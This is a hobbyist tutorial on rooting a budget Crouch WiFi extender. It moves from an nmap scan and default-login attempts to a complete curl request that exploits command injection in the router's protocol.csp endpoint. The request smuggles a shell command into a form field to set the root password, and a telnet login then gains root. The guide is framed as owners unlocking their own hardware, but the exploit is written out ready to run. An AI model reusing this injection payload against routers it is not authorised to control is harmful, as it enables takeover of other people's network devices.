How to Root Cheap Wifi Router (Crouch WiFi Extender 2.4G 300Mbps) from China

Submitted by freakyit on

How to Root Cheap Wifi Router (Crouch WiFi Extender 2.4G 300Mbps) from China

Many budget-friendly WiFi extenders from China, like the Crouch WiFi Extender 2.4G 300Mbps, come with limited firmware, locked-down settings, and bloatware that restricts their full potential. Rooting your router allows you to unlock advanced features, improve performance, and gain full administrative control. However, rooting carries risks, including voiding warranties and potential bricking. This guide will walk you through the process safely.

Step 1: Connect to the Router

  1. Use an Ethernet cable to connect your computer to the router.
  2. Open a browser and navigate to http://192.168.11.1 to access the router’s web interface.
  3.  

Step 2: Check Open Ports with Nmap

  1. Run an Nmap scan to identify open ports:

    sudo nmap -sV 192.168.11.1

  2. Nmap output:

    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 02:45 CET

    Nmap scan report for 192.168.11.1 

    Host is up (0.0047s latency). 

    Not shown: 996 closed tcp ports (reset) 

    PORT   STATE SERVICE    VERSION

     23/tcp open  telnet     BusyBox telnetd

     53/tcp open  domain     dnsmasq 2.84rc2

     80/tcp open  http       lighttpd 1.4.32

     81/tcp open  hosts2-ns?

     OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU No OS matches for host Service Info: Host: WifiRouter

  3. We see telnet is open on port 23, proceed to the next step.

Step 3: Attempt Default Logins

Try default credentials such as admin/admin or root/root. If these do not work, additional exploitation may be needed.

Step 4: Identify Security Vulnerabilities

  1. Based on Nmap results, check for Common Vulnerabilities and Exposures (CVEs) related to your router.
  2. A known OpenWrt security issue was found involving protocol.csp.

Step 5: Exploit the Vulnerability and Change SSID/Password

  1. Inspect the router frontend using browser debugging tools.

  2. Construct a cURL command to exploit the vulnerability (we add ;$(echo "root:root" | chpasswd)& to the command to change the roots password to root usinig chpasswd and we change the SSID and wifi password that we use where we want to connect to:

    curl 'http://192.168.11.1/protocol.csp?' --compressed -X POST \ -H 'Accept: application/json, text/javascript, */*; q=0.01' \ -H 'Accept-Language: en-CA,en-US;q=0.7,en;q=0.3' \ -H 'Accept-Encoding: gzip, deflate' \ -H 'Referer: http://192.168.11.1/home.html' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'X-Requested-With: XMLHttpRequest' \ -H 'Origin: http://192.168.11.1' \ -H 'Connection: keep-alive' \ -H 'Pragma: no-cache' \ -H 'Cache-Control: no-cache' \ --data-raw 'fname=net&opt=wisp_conf&function=set&ssid=New_SSID&channel=6&security=WPA2PSK&enc=AES&key=New_Password&bssid=2C:00:AB:79:89:3D&extap2g=wiiredr;$(echo "root:root" | chpasswd)&'

  3. Replace New_SSID with your desired WiFi network name and New_Password with your new WiFi password.
  4. Execute the command.

Step 6: Verify Root Access 

  1. Open Telnet and attempt to log in using root:root.
  2. If successful, you now have root access to your router.

Conclusion 

Rooting the Crouch WiFi Extender 2.4G 300Mbps allows you to unlock advanced settings, enhance security, and optimize performance. Additionally, you can change your SSID and password directly through the exploited command. However, always back up your firmware before proceeding and be prepared for troubleshooting. Happy hacking!